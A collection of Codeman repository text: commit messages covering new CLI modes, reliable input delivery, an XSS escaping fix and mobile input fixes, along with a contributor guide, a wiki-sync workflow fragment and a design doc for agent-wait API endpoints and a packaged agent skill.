shape, so the Run-Gemini button could never start a session).
- setGeminiEnvVars() now uses the socket-scoped ${this.tmux()} setenv instead of
bare tmux — Gemini/Google auth env vars were targeting the wrong tmux server
and silently failing on every install.
Gemini parity polish:
- gemini tab-mode badge ('gm') + .tab-mode.gemini CSS; kill-dialog label
'Kill Tmux & Gemini'; codeman doctor dependency-registry entry; export
isGeminiAvailable from utils barrel; COLORTERM=truecolor + unset NO_COLOR;
add gemini to isAltScreenStripMode (Ink TUI, repaints inline like Codex/Claude).
- Revert 4 system-routes.test.ts envelope assertions weakened to
(body.message ?? body.error) back to (body.success === false).
- Add a runGemini() vm-sandbox test that drives the envelope path end-to-end.
Ralph todo-config (PR #135): maxTodos/todoExpirationMinutes are now persisted
and read back — surfaced via the loopState getter (RalphTrackerState) into
toState()/SSE broadcast and restored in restoreState(), mirroring maxIterations.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
The reliable-delivery layer marks every keystroke as briefly pending until its
ACK lands a few ms later, which made the connection indicator flash
"Sending 1B…" on every character during normal typing. Hide the indicator
entirely while the connection is healthy (connected/connecting) — it now only
appears for an actual problem (reconnecting/offline), where the queued-byte
count reassures the user their input is safely buffered.
Verified in a real browser: hidden throughout connected typing, shows
"Offline (NB queued)" when offline, hides again after reconnect+delivery.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
The mobile copy/paste overlay's "🖼 Image" button (and drag-drop / paste)
now handles real-world photo batches:
- Up to 20 images per batch, uploaded with bounded concurrency (3) and a
live "Uploading N/M…" progress toast; a final summary reports successes,
any failures, and whether the 20-cap trimmed the selection (no silent
truncation).
- Per-file upload limit raised 10MB → 50MB (MAX_PASTE_IMAGE_BYTES in
buffer-limits.ts, env-overridable) so full-resolution phone photos and
large screenshots aren't rejected.
- Very large images are downscaled to <=4096px longest edge before upload:
fixes iOS Safari's ~16.7M-px <canvas> limit (which made huge photos fail
to re-encode and fall back to an original that tripped the magic-byte
check), and keeps batch uploads fast and small.
- Fix a latent concurrency bug the batch path exposed: the first parallel
uploads to a session raced on `mkdir(.claude-images)` and the EEXIST
losers 500'd. mkdir now treats an existing real directory as success
(re-verifying it isn't a planted symlink), so concurrent uploads succeed.
Verified end-to-end in a real browser (Playwright): downscale, >10MB
server acceptance, 20-cap, 20/20 concurrent uploads landing on disk.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
The mobile-header-buttons-policy static guard requires every default-visible
header button to make an explicit phone-visibility decision. The new
.btn-away-digest button had none, failing CI. Hide it on phones alongside
.btn-settings / .btn-lifecycle-log — it's a secondary informational control
that doesn't belong on the cramped phone header.
The Ralph settings modal sent maxTodos/todoExpirationMinutes but RalphConfigSchema
(zod) stripped them and the ralph-config route never applied them, so the inputs
were silent no-ops.
Fix: add both as optional positive-int fields to RalphConfigSchema; destructure
and apply them in the ralph-config route (matching the maxIterations pattern).
RalphTracker had no setters (the values were module constants) — added per-instance
_maxTodos/_todoExpiryMs (defaulting to the same constants, behavior unchanged),
switched the eviction + expiry sites to read them, and added
setMaxTodos/setTodoExpirationMinutes (minutes→ms) + getters.
Test: route test POSTs the two fields and asserts the route applies them to the
tracker. Verified RED (setters not called — fields stripped) → GREEN. 34/34
ralph-routes tests pass; tsc + eslint(src) + prettier + build clean. Frontend
already sent the fields (no change).
A "sent" prompt could vanish with no trace on a flaky connection (e.g. a train):
with local echo on, Enter cleared the overlay then sent over the WebSocket
fire-and-forget. On a half-open socket (readyState===OPEN, dead TCP) ws.send()
doesn't throw, so the frame was silently discarded, nothing was enqueued, and
navigator.onLine stayed true — the prompt was lost and never resent.
Replace the best-effort offline queue with a durable, acknowledged delivery layer:
- Client (app.js): every input frame is recorded with a stable clientId +
monotonic per-session seq and persisted to localStorage BEFORE delivery, and
only dropped on a server ACK. Delivered over WS (acked via {t:'ia',seq}) or,
when the socket is down, POST in seq order (HTTP 2xx = ACK). A 2s sweep
force-reconnects a WS whose oldest frame is unacked past 4s (half-open sockets
never recover on their own); on reconnect/reload all pending frames re-deliver.
Survives reconnects AND page reloads. Connection indicator shows pending count.
- Server: Session.shouldApplyInput(clientId, seq) applies each frame exactly once
(bounded MRU map); ws-routes + POST /input dedup a redelivered seq but still ACK
it (200 / {t:'ia'}), so an at-least-once resend can never type the prompt twice.
Untagged input (curl/legacy) applies unconditionally — no behavior change.
- terminal-ui.js sendInput() (voice / keyboard-accessory / paste) now routes
through the same durable layer.
Tests: test/reliable-input-dedup.test.ts (exactly-once semantics on the real
Session) + POST /input dedup route tests. Design: docs/reliable-input-delivery.md.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Pinch any floating subagent or ultracode run/transcript window with the
camera hand-tracking overlay and move it anywhere. Adds a 'window' grab
kind to entry.ts, slotted into the pinch priority chain
(cg-float panel → agent window → session tab → toolbar button). It moves
the window via its own style.left/top (matching app.js's mouse drag,
incl. bottom:'auto') and calls window.app.updateConnectionLines() so the
glowing connector line to the session tab tracks live — app.js redraws
from fresh rects, so no reach into its internals.
Hardening: el.isConnected guard (ultracode windows tear down mid-grab on
SSE reconnect / auto-close), all window.app calls optional-chained +
try/caught so the standalone playground still works, bring-to-front via
app.js's own z-counters, rAF-coalesced redraws cleared on drop so the
final placement always redraws.
Rebuilt the committed gesture-codeman.js bundle.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Extends PR #132 (ultracode handlers) to the rest of the frontend. The same
JS-string-in-HTML-attribute pattern — '${escapeHtml(value)}' — remained in 32
more inline handlers across app.js, panels-ui.js, session-ui.js,
subagent-windows.js, and notification-manager.js. The browser HTML-decodes the
attribute value before parsing the handler source, so escapeHtml's ' reverts
to ' and a quote-bearing id/path/name breaks out of the JS string literal into
executable code.
Switch all to escapeHtml(JSON.stringify(value)): JSON.stringify JS-encodes and
quote-wraps first, then escapeHtml handles the HTML-attribute layer, so the
value round-trips as one inert string argument.
Also fixes two non-escapeHtml variants of the same class:
- panels-ui.js: mux-session `sid` was pre-escaped with escapeHtml() then dropped
into a single-quoted JS string (selectSession / killMuxSession). Now
JSON.stringify'd at the source.
- orchestrator-panel.js: phase.id was interpolated raw (no escaping at all) into
orchestratorSkipPhase / orchestratorRetryPhase. Now escapeHtml(JSON.stringify()).
The most realistic vector here is file paths (panels-ui openLogViewerWindow) —
filenames can legally contain a single quote.
Numeric interpolations (${i+1}, ${index}, ${item.version}) and the
developer-literal ${onclick} in orchestrator-panel are not user data and are
left as-is. Verified: 0 vulnerable patterns remain, all 22 frontend files parse
(check:frontend-syntax + node --check), and a runtime round-trip confirms the
injection that fired under the old pattern is now an inert string argument.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
The ultracode run/agent cards and minimized-tab badges built inline onclick
handlers by interpolating escapeHtml(value) inside single-quoted JavaScript
strings within an HTML attribute:
onclick="app.openUltracodeAgentWindow('${escapeHtml(agentId)}', ...)"
escapeHtml maps ' -> ', but the browser HTML-decodes the attribute value
before the handler source is parsed, so ' becomes a literal ' again and a
quote in a run/agent/session id breaks out of the string literal into
executable JS. escapeHtml alone is insufficient for the JS-string-within-HTML-
attribute double context.
Switch each handler to escapeHtml(JSON.stringify(value)): JSON.stringify
JS-encodes and quote-wraps the value, then escapeHtml handles the HTML
attribute layer, so the value round-trips as an inert string argument. This
matches the encoding already used by other handlers in these files.
Affected:
- ultracode-panel.js: selectWorkflowRun, openUltracodeAgentWindow
- ultracode-windows.js: restore/dismiss for minimized run and agent tabs
Clicking an agent card opens its live transcript as an in-page connected
floating window instead of a detached browser popup. The "−" button on both
run and agent windows now minimizes into the originating session tab as a
restorable ULTRA badge (🧬 runs, 📄 transcripts). Removes the old
collapse-to-header behavior.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
The touchmove handler accumulated pixelAccum/velocity and could scrollLines
on every move — including micro-drift below the 8px tap threshold. A jittery
tap (<8px) stayed classified as a tap (didScroll=false, so tap-to-position
fired) yet still left a non-zero velocity, which touchend turned into a
momentum fling. Result: one tap both positioned the cursor and scrolled.
Gate the scroll/velocity accumulation behind didScroll so sub-threshold
movement is inert, matching the handler's stated tap-vs-scroll intent.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
touchmove fires on any 1px finger drift, marking didScroll=true and
skipping the tap handler (which refocuses terminal/CJK input). On
iPad's large touch surface and phones with imprecise taps, this makes
terminal tap unreliable — cjkActive gets stuck true, blocking all
input (CJK and paste).
Add 8px TAP_THRESHOLD: finger movement under 8px is still a tap.
Also add touch-action:none on .touch-device .terminal-container
so the browser doesn't consume touch events before our JS handler.
touch-action: none was only set inside @media (max-width: 430px),
so iPad's browser consumed touch events before the JS scroll/tap
handler could preventDefault. Move to .touch-device class in
styles.css so it applies at any screen width.
Reverts eb83148 which removed the /compact button from both simple
and extended accessory bar modes. Restores double-tap confirmation
and refocus guard for the compact action.
backdrop-filter on the toolbar creates a stacking context that traps
the popover's z-index (1000) inside the toolbar. CJK input (z-index 52)
in the root stacking context always wins. Use :has() to raise the
toolbar above CJK only while the popover is visible.
Move keyboard accessory bar and paste dialog CSS from mobile.css
(gated behind max-width: 1023px) to styles.css (always loaded).
iPad landscape (≥1024px) was getting unstyled white buttons.
- Add position:fixed via .touch-device class for accessory bar
- Fix dismiss button: gray-blue → blue, matching phone styling
- JS: position accessory bar above keyboard on iPad via direct bottom
- JS: position CJK above accessory bar (bottom: keyboardHeight + 44)
- Clear accessory bar bottom in resetLayout()
Phones use translateY(-keyboardOffset) — CSS bottom is relative to layout
viewport and keyboardOffset reliably lifts it above the keyboard (iOS
doesn't auto-scroll the visual viewport for the CJK textarea on phones).
iPad uses direct bottom positioning from keyboard height — translateY
broke because iOS auto-scrolls the visual viewport when the CJK textarea
receives focus, making keyboardOffset approach 0.
Three iPad-specific issues fixed:
1. CJK input hidden behind keyboard: updateLayoutForKeyboard() gate changed
from screen-size to touch-device detection. On iPad, CJK textarea (always
position:fixed) gets bottom offset computed from keyboard HEIGHT directly
instead of keyboardOffset (which depends on visualViewport.offsetTop that
iOS adjusts when the CJK textarea receives focus). Toolbar/accessory bar
transforms remain phone-only (they're normal-flow on iPad).
2. Paste dialog invisible on iPad: paste overlay CSS was inside
@media (max-width: 430px) phone breakpoint — iPad (≥768px) had no styling.
Extracted to universal section alongside keyboard accessory bar styles.
3. Voice dictation character duplication (Doubao/third-party IME):
iOS voice dictation does NOT fire composition events (WebKit Bug 261764).
Text arrives as bare input events; refinement is a delete→reinsert cycle.
Rewrote CJK input handler with two-tier debounce:
- Keyboard typing (no delete/replacement events): 150ms debounce
- Dictation mode (deleteContentBackward or insertReplacementText detected):
1500ms debounce, persists 3s to cover multi-word dictation
- Composition path (compositionend): immediate flush, unchanged
- Keydown singles/Enter/Esc/Ctrl: immediate, unchanged
Also: keep cjkActive=true on blur while CJK is visible (prevents xterm
from processing duplicate input when iOS dictation UI steals focus);
keydown single-char sends tracked via timestamp to suppress the echo
input event that third-party IMEs fire despite preventDefault.
Programmatic _textarea.value = '' during compositionstart cancels the
active IME composition on iOS Safari, breaking Chinese character input.
The phantom (U+200B) is invisible and _strip() already removes it
before sending to PTY — no need to clear it manually.
Root cause: the mobile-composer mode (02fa3f3) routed CJK text through
local-echo buffering, which accumulated characters until Enter instead
of sending each composed word to the PTY immediately. Additionally,
xtermFocusRedirect hijacked all terminal taps, preventing cursor
positioning and scroll interaction.
Changes:
- Remove mobile-composer accumulation mode from input-cjk.js — all
platforms now use the same immediate-flush path (compositionend →
flush → PTY)
- Bypass local-echo buffering in _handleCjkInput (terminal-ui.js) —
the CJK textarea already provides visual feedback
- Remove xtermFocusRedirect so terminal taps work normally again
- Reduce CJK textarea height (34px min, 6px padding) for less
screen intrusion
- Paste dialog now sends Enter after text so pasted content submits
- Hide CJK textarea on welcome screen (no active session)
- Add Opus 4.6 model options to selector
- Daylight Blue: Cloudflare Tunnel welcome button is now purple (was orange),
keeping Claude blue / Tunnel purple / OpenCode green distinct.
- Allow enabling the Cloudflare tunnel with no CODEMAN_PASSWORD via the UI: the
toggle now pops a security confirm dialog and, on confirm, sends an explicit
per-request acknowledgeUnauthTunnel:true (new action field, never persisted).
Server logs a loud warning whenever a passwordless public tunnel starts.
curl/API/CLI stay refused unless password/env/flag — no accidental exposure.
Tests: extend test/routes/system-routes-tunnel-guard.test.ts (ack allows + not
persisted; ack:false still refuses). Verified e2e on an isolated instance
(purple button, confirm dialog, retry carries the flag, no real tunnel opened).
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
On the default daylight-blue skin the three welcome buttons all read blue.
Give each its own identity: Run Claude Code keeps the blue accent, Cloudflare
Tunnel takes Cloudflare brand orange, Run OpenCode takes emerald green (with
matching hover/active states + dark ink for contrast). Scoped to daylight-blue
only; daylight-green and OG unchanged. Verified in-browser (blue/orange/green).
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Terminal scroll-up intermittently broke for Claude sessions (most visible on
iPhone). Claude Code periodically emits alt-screen switches (?1049h/?47h/?1047h),
scrollback-erase (3J), and mouse-tracking enables for full-screen UIs, which move
xterm.js to the scrollback-less alt buffer / wipe saved lines / hijack the wheel.
Codeman stripped these but only for codex mode.
Share the strip via isAltScreenStripMode(mode) = codex || claude, applied at both
sites that were codex-only: the live PTY stream (Session._handleTerminalOutput,
incl. the chunk-boundary carry) and the /terminal buffer replay. shell stays
excluded (vim/less/htop need the alt screen); opencode unchanged.
Tests: test/claude-scrollback-strip.test.ts (8 new); codex strip tests unchanged.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Re-run syncAllUltracodeFloatingWindows() after server settings load so a
first-time device whose getLightState run snapshot arrives before the async
settings fetch resolves still pops an already-active run's window immediately,
instead of waiting for the next ~10s watcher tick. Also fixes a stale
@fileoverview comment that named the wrong gating setting.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
closeUltracodeAgentsPanel() only removed `open`, leaving the drawer in its
collapsed peek state (header strip still visible) — so (x) looked like a no-op.
Now also adds `hidden` (display:none), mirroring closeSubagentsPanel; does NOT
flip showUltracodeAgents (that gates the watcher + floating windows). Verified in
a real browser (post-close computed display:none). Bumps 1.1.4 -> 1.1.5.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
The Workflow runtime writes workflows/wf_<id>.json only at completion (always
terminal), so workflow-run-watcher never saw a run until it was already done and
the ACTIVE-gated floating window never popped. The watcher now also scans
subagents/workflows/wf_<id>/ and synthesizes a minimal running record (agentId
slots preserved for the transcript-click join, lastActivityAt from mtimes,
done/running from the journal), superseded by the real wf_<id>.json at
completion. Standalone (no subagent-watcher import). Verified e2e on a real
in-flight run; +6 unit tests. Bumps 1.1.3 -> 1.1.4.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
2026-06-15 22:20:52 +02:00
615 changed files with 152794 additions and 7473 deletions
Add Grok Build (xAI `grok`) as a seventh CLI run mode. SessionMode gains 'grok', with its own resolver (version-probed, since the name has npm squatters; GET /api/grok/status surfaces path + version), GrokConfig (model, alwaysApprove -> --always-approve, resume/continue), GROK_*/XAI_* env allowlist entries, the multi-user only-if-sent bypass clamp, Docker (own image step + per-file credential seeding) and remote-SSH command defaults, cron agentType, run-mode/welcome/tab UI with a charcoal identity, and docs (grok-integration.md + plan). Verified end to end against grok 1.0.5 on an isolated instance.
Thanks for wanting to help! Codeman is a small project with a fast loop: issues usually get a response within a day, good PRs get reviewed quickly, and every release credits its contributors and bug reporters by name in the release notes. This guide gets you from clone to merged PR without stepping on the traps.
## The short version
1.**Bugs**: open an issue with your OS, install method (installer / npm / git clone), browser, and which CLI + version the session was running.
2.**Questions and ideas**: use [Discussions](https://github.com/Ark0N/Codeman/discussions), not issues.
3.**Small fixes** (docs, typos, a new skin, a translation): just send the PR.
4.**Anything bigger**: open an issue or Discussion first and get a nod before building. Codeman has strong architectural invariants, and a design chat up front is what turns a big idea into a merged PR instead of a stalled one. This flow works: features like Clone Repo (#236) went idea, then design discussion, then review, then shipped.
5.**Security issues**: never a public issue. See [SECURITY.md](SECURITY.md).
## Dev setup
Requirements: Node.js 22+ (see `.nvmrc`), tmux, and at least one supported agent CLI on your PATH (Claude Code is the primary one).
```bash
git clone https://github.com/Ark0N/Codeman.git
cd Codeman
npm install # postinstall builds the vendored xterm addon bundles
npm run dev # dev server on http://localhost:3000
```
The frontend is plain JS served from `src/web/public/` with no bundler in dev: edit a `.js`/`.css` file and reload the page. The one exception is `index.html`, which is read once at server start, so markup changes need a server restart.
## Before you push
CI runs all of these, so save yourself a round trip:
```bash
npm run typecheck # tsc --noEmit, strict mode
npm run lint
npm run format:check
npm run check:frontend-syntax # syntax-checks the plain-JS frontend modules
```
### Tests
```bash
npm test# the gate — exactly what CI runs
npm test -- test/<file>.test.ts # one file
```
`npm test` is the same suite CI runs, so a green run locally means a green run there. It leaves out three suites that cannot pass on an arbitrary machine, each with its own command:
```bash
npm run test:browser # Playwright + chromium (+ a live server; codex-predictive-echo needs a real codex binary)
npm run test:mobile # the above plus environment-specific PNG baselines
npm run test:perf # wall-clock benchmarks — run on an otherwise idle machine
npm run test:all # literally everything, environmental failures included
```
Expect `test:browser`/`test:mobile`/`test:perf` to fail where the machine cannot provide what they need; read that as "not runnable here", not as a regression. `config/test-suites.ts` holds the globs, and both configs derive from it, so the exclusions and those runners cannot drift apart.
If you add a test that binds a port, pick a unique one at 3150 or above (search the repo for `const PORT =` first). Never 3000.
Tests are tmux-safe by design: under vitest, the tmux layer becomes an in-memory mock, so tests cannot touch real sessions.
## Finding your way around
- Every source file starts with a `@fileoverview` JSDoc block. Read it before diving into the file, it is the map.
- [`CLAUDE.md`](../CLAUDE.md) at the repo root is the densest architecture primer in the repo. It is written for AI coding agents, but the invariants and gotchas in it apply to humans exactly the same, and most review feedback on PRs traces back to something already written there.
- Deep mechanisms and the history behind each rule live in [`docs/architecture-invariants.md`](../docs/architecture-invariants.md).
- Third-party extension surfaces are documented in [`docs/extending-codeman.md`](../docs/extending-codeman.md).
## Great first contributions
These are well-fenced areas where a first PR is genuinely easy to get right:
- **A new theme skin.** A skin is four things kept in sync: the `html[data-skin="…"]` token block in `styles.css`, the xterm ANSI palette in `terminal-ui.js`, the pre-paint allowlist and the settings picker (both in `index.html`). `test/skin-themes.test.ts` statically checks the sync, so if the test passes, your skin works.
- **A new language.** `src/web/public/i18n.js` is dependency-free, English is the canonical source, and `zh-CN` is a complete example to copy. Add your language's entries and register it in `SUPPORTED_LANGUAGES`.
- **Docs.** If you got stuck on something and then figured it out, the sentence that would have unstuck you is a PR.
- Anything labeled [`good first issue`](https://github.com/Ark0N/Codeman/issues?q=is%3Aissue+is%3Aopen+label%3A%22good+first+issue%22).
Bigger extension points worth discussing first: new CLI backends (the pluggable resolver pattern has absorbed six CLIs so far; `docs/extending-codeman.md` and `docs/opencode-integration.md` show the shape), and real-device testing reports, especially mobile, which always find things emulation cannot.
## PR expectations
- **One change per PR.** Small and focused reviews fast; a grab-bag stalls.
- Target the `master` branch.
- **Keep your branch mergeable.** A PR with conflicts silently gets no CI runs at all (GitHub quirk), so rebase or merge master when conflicts appear.
- Include or update tests when you change behavior. Route handlers have a lightweight pattern in `test/routes/` using `app.inject()` (no live server needed).
- Formatting is Prettier with a deliberately narrow scope (`npm run format`), several frontend files are hand-formatted on purpose and excluded via `.prettierignore`. Don't "fix" a file by adding it back into Prettier's scope.
- Don't bump versions or touch `CHANGELOG.md`; releases are handled by the maintainer via changesets after merge.
- AI-assisted contributions are welcome (much of Codeman is built that way), with one condition: you must understand what you're submitting and have actually run it. "The model said it works" is not a test.
## Conduct
Be kind, be direct, assume good faith. Report unacceptable behavior privately via the contact in [SECURITY.md](SECURITY.md).
if ! git clone "https://x-access-token:${WIKI_TOKEN}@github.com/${GITHUB_REPOSITORY}.wiki.git" wiki 2>"${RUNNER_TEMP}/clone-err.txt"; then
cat "${RUNNER_TEMP}/clone-err.txt"
echo "::error::Could not clone ${GITHUB_REPOSITORY}.wiki.git. If this says 'Repository not found', the wiki has never had a page: save one at https://github.com/${GITHUB_REPOSITORY}/wiki/_new and re-run. If it says 403, add a WIKI_TOKEN secret."
exit 1
fi
- name:Mirror pages
run:|
set -euo pipefail
# The mirror deletes before it copies, so an empty source would wipe
# every published page and the commit step would happily push that. A
# MISSING directory already fails safely (cp aborts under set -e); an
# empty one does not, so check explicitly. This is the one failure mode
# here that destroys something a browser edit cannot get back.
if [ ! -d docs/wiki ]; then
echo "::error::docs/wiki does not exist. Refusing to mirror, which would delete the entire published wiki."
git commit -m "docs: sync wiki from docs/wiki @ ${GITHUB_SHA:0:7}"
if ! git push 2>"${RUNNER_TEMP}/push-err.txt"; then
cat "${RUNNER_TEMP}/push-err.txt"
echo "::error::Could not push to ${GITHUB_REPOSITORY}.wiki.git. A 403 here means the token can read the wiki but not write it, which is the usual GITHUB_TOKEN case: add a fine-grained PAT with wiki write access as the WIKI_TOKEN secret."
| Agent state | Four states (`idle`, `working`, `blocked`, `done`) that roll up pane to tab to workspace in a sidebar |
| Detection | Lifecycle hooks where the agent supports them (it names Pi and MastraCode), otherwise TOML manifests matched against a live bottom-buffer snapshot. Bundled manifests plus remote updates from herdr.dev, local overrides win |
| Control API | Newline-delimited JSON over a Unix socket (`~/.config/herdr/sessions/<name>/herdr.sock`), `{"id":"req_1","method":"pane.split","params":{}}`, dot-notation methods, plus long-lived event subscriptions |
| Discoverability | `herdr api schema` prints a machine-readable schema |
| Agent skill | `npx skills add herdrdev/herdr --skill herdr -g`, a SKILL.md wrapping the CLI, guarded by `test "${HERDR_ENV:-}" = 1` so an agent outside a herdr pane refuses to act |
| Persistence | Background server, detach with `ctrl+b q`, snapshot restore of workspaces/tabs/panes/cwd/layout, experimental screen-history replay, agent resume via native session ids, live PTY handoff across server replacement |
| Plugins | `herdr-plugin.toml` manifest, actions, event hooks, plugin panes, link handlers, GitHub-topic marketplace index |
| Skill file | README section "Driving Codeman from an Agent" | **not packaged**, an agent will never find it |
| Env guard `HERDR_ENV=1` | `CODEMAN_MUX=1`, `CODEMAN_API_URL`, `CODEMAN_SESSION_ID` already exported at spawn | none, the guard variables exist |
| `blocked` state | hook events (`permission_prompt`, `elicitation_dialog`) plus CSS classes plus the phone overview NEEDS YOU section | not in the wire contract (`SessionStatus = 'idle' \| 'busy' \| 'stopped' \| 'error'`) |
| send a prompt | `POST /api/v1/sessions/:id/input {input:"…\r", useMux:true, clientId, seq}` (the trailing `\r` is what sends Enter; without it the text sits on the prompt unsubmitted) |
| `stop` | `POST /api/hook-event` with `event: 'stop'`, the definitive "Claude finished responding" signal already used by `controller.signalStopHook()` |
| `blocked` | `POST /api/hook-event` with `permission_prompt` or `elicitation_dialog` |
| `exit` | `Session` emits `exit` |
`stop` is the highest-quality signal for "the turn is over" and should be the documented default
for orchestration. `idle` is heuristic: output stabilization plus prompt detection, and it can
flap mid-turn when a spinner pauses. External CLI modes (`isExternalCliMode()`) have no stop
hook at all, so for opencode/codex/gemini/antigravity only `idle`, `working` and `exit` are
available. **The skill and the docs must say which signals exist per mode**, otherwise an agent
| Session already idle, `fresh=1` | wait for the next transition into a requested state |
| Session dies mid-wait | resolve with `signal: "exit"` if `exit` was requested, otherwise resolve `timedOut:false, signal:null, ended:true`. Never hang |
| Session deleted mid-wait | same, resolve, do not throw. Verified live: `until=exit` gets `signal:"exit"`, a concurrent `until=blocked` gets `ended:true`, both in ~0ms |
| Shutdown with a wait pending | `cancelEverything()` in `stop()`. Verified live: SIGTERM with a 300s wait in flight exits in 1s |
| External CLI mode | `stop` and `blocked` never fire. Reject `until=stop` for those modes with a clear `INVALID_INPUT` rather than hanging until timeout |
| Multi-user | goes through `findSessionOrFail(ctx, id, req)`, which already enforces ownership |
| Remote / Docker cases | signals originate from the same `Session` object, so no special casing. Docker hooks need `CODEMAN_DOCKER_BRIDGE_HOOKS=1` for `stop`/`blocked` to arrive at all; without it, only `idle` works. Document it |
| Respawn `/clear` mid-wait | a respawn cycle emits `idle`. Callers waiting on `stop` are unaffected; callers on `idle` may resolve early. Documented, not fixed |
| Limit pause | if the session is paused on a usage limit, nothing will fire until the reset. The wait times out honestly. Consider surfacing `limitPaused: true` in the response so the caller can back off |
| 1 ✅ | `src/config/agent-wait.ts` + `session-wait-registry.ts` + unit tests | 48 tests green |
| 2 ✅ | `GET .../wait` + wiring in listener-wiring, hook-event-routes, server teardown | 15 route tests green; live-verified on an isolated `CODEMAN_INSTANCE=waittest` instance (immediate resolve, 400 on a bad signal, 200+`timedOut` on timeout, hook `stop` and `permission_prompt`→`blocked` waking an in-flight wait, delete delivering `exit`, SIGTERM not blocked); full `test:ci` sweep green |
| 3 ✅ | `GET .../wait-output` | 16 route tests green; live-verified on real PTY bytes (`echo MARKER` waking a blocked request in ~1s, `from=buffer` immediate hit, never-seen marker timing out at exactly 2001ms, nocase, `regex` refused with a 400); full `test:ci` sweep green |
| 4 ✅ | `wait` field on `POST .../input`, non-wait path proven unchanged | 16 route tests green; live-verified (no-wait returns in 26ms with the historical bare body; an idle session did NOT satisfy a `wait` request, blocking the full 2001ms, which is the race the endpoint exists to close; the stop hook resolved a send-and-wait at 1510ms and the input was confirmed in the tmux pane; `wait:null` accepted) |
| 5 ✅ | `skills/codeman/SKILL.md` + reference files + `.claude/skills` symlink | live dogfood: a real session orchestrates a worker end to end |
| 6 ✅ | `codeman skill install` CLI + `applyAgentSkill()` + `agentSkillEnabled` setting | 10 unit tests (`test/agent-skill.test.ts`) + real-server case-creation tests (`test/quick-start.test.ts`, incl. the settings PUT accepting the key) green; CLI verified live (install/uninstall, global + `--case`, foreign/symlink refusals) |
| 7 ✅ | Docs: api-reference, extending-codeman, README | plus `architecture-invariants.md` (§agent-wait-primitives), `CLAUDE.md` and the API reference's per-mode signal table |
| 8 ✅ | COM (minor bump: new endpoints, new setting, new optional fields) | released as 1.13.0 (wait primitives + skill); step 6 followed in 1.14.1 and was republished as 1.14.2 after live-testing the packaged skill |
Parts 1 and 2 are independent enough to land separately, but the skill is much less useful
without the wait endpoints, so the wait work goes first.
## 6. Open questions for the owner
1. ✅ `skills/` at the repo root: accepted (built that way; the install one-liner depends on it).
2. ✅ `agentSkillEnabled` default: **OFF** for the first release, per §2.2's rationale (skills
cost context on every turn; measure before defaulting on). Flip later if dogfooding earns it.
3. ✅ Both: global install via `npx skills add` / `codeman skill install`, AND per-case
auto-injection behind the (default-off) setting. Injection is add-only at session create and
marker-guarded, so a user-authored copy is never touched.
4. Is `X-Codeman-Caller-Session` self-protection worth the 10 lines, given it is a footgun guard
and not a security boundary? (Still open, not built with step 6.)
5. ✅ Regex support in `wait-output`: literal-only shipped, and a `regex` query param is
rejected with a 400 rather than ignored, so an agent that assumed otherwise cannot
silently wait on the wrong thing.
---
## 7. Build log: what actually happened
Written at the end of the build so the next person inherits the reasoning, not just the
diff. Process artifacts (per-agent briefs, findings, reports) live in the gitignored
`tmp/agent-wait-review/`; this section is the part worth keeping.
| `agentSkillEnabled` (SYNCED, default OFF) | `schemas.ts` (`SettingsUpdateSchema`), `getAgentSkillEnabled()` on `ConfigPort`/`server.ts`, checkbox in `index.html` + `settings-ui.js` |
| Injection call sites (Claude mode only) | `POST /api/sessions` next to `refreshStaleCodemanHooks`; `POST /api/quick-start` after the case-create/self-heal blocks (local + docker cases; remote skipped, its path lives on another host) |
| Tests | `test/agent-skill.test.ts` (10 unit), `test/quick-start.test.ts` (real server: default-off, PUT accepts key, injection on create, shell-mode skipped) |
Decisions worth keeping:
- **Ownership marker, prefix-matched.** The injected SKILL.md ends with
`<!-- codeman-managed-agent-skill: … -->`; install/refresh/remove all refuse a copy
without the marker (a user's own skill) and match on the PREFIX so a wording change
cannot disown older injected copies (the `BACKGROUND_WAKE_MARKER_PREFIX` pattern).
- **Symlink refusal.** This repo's own dogfooding layout
(`.claude/skills/codeman -> ../../skills/codeman`) means the injector must `lstat`
the skill dir AND its `skills/` parent and bail on a symlink, or enabling the
setting in the Codeman repo itself would overwrite the skill source through the link.
- **ADD-ONLY at session create**, same shared-`.claude` rationale as the statusLine:
a create while the setting is off must not yank the skill out from under other live
sessions in the repo. The remove path exists (CLI `skill uninstall`, tests); no
automatic sweep removes on toggle-off.
- **Removal is manifest-based, never `rm -rf`**: only files the packaged source would
have written are deleted, directories are pruned bottom-up only if they emptied, so
a user's extra notes in `reference/` survive an uninstall.
- **Source resolution**: `join(moduleDir, '..', 'skills', 'codeman')` works from
`src/` (tsx), `dist/` (tsc build), and the npm tarball alike, because all three sit
one level below the package root and `files` ships `skills/`.
- **Nothing acts on the setting at PUT time**: injection reads the merged persisted
settings at session create (`readSettings`, ~2s cache), so the partial-PUT invariant
(`toggleService` reading `merged`) is untouched by construction.
### 2026-08-09 addendum: cross-session messaging folded into the skill
Claude Code 2.1.224+ ships cross-session messaging: `ListAgents`/`SendMessage`
tools, a per-session Unix inbox socket, and a registry in
`~/.claude/sessions/<pid>.json`. Codeman's claude workers are ordinary local Claude
Code sessions, so the skill now routes task delivery and result collection over it
when available, while the HTTP primitives keep spawn, readiness, synchronization,
liveness and delete. New `skills/codeman/reference/messaging.md` (ships with zero
installer changes: `readAgentSkillSource()` enumerates `reference/*.md` from disk),
Flow 5 in recipes.md, and §4 in SKILL.md.
Verified live (claude-cli 2.1.226, Linux):
- A message to an idle worker starts a turn and that turn fires the normal `stop`
hook (8.3 s send-to-stop measured), so the HTTP wait primitives compose with
messaging unchanged; delivery to a busy session lands between tool calls.
- First contact needs the `name [ref]` form; the bare name errors with the exact
string to resend. The `uds:` reply address of an inbound message works as a `to`.
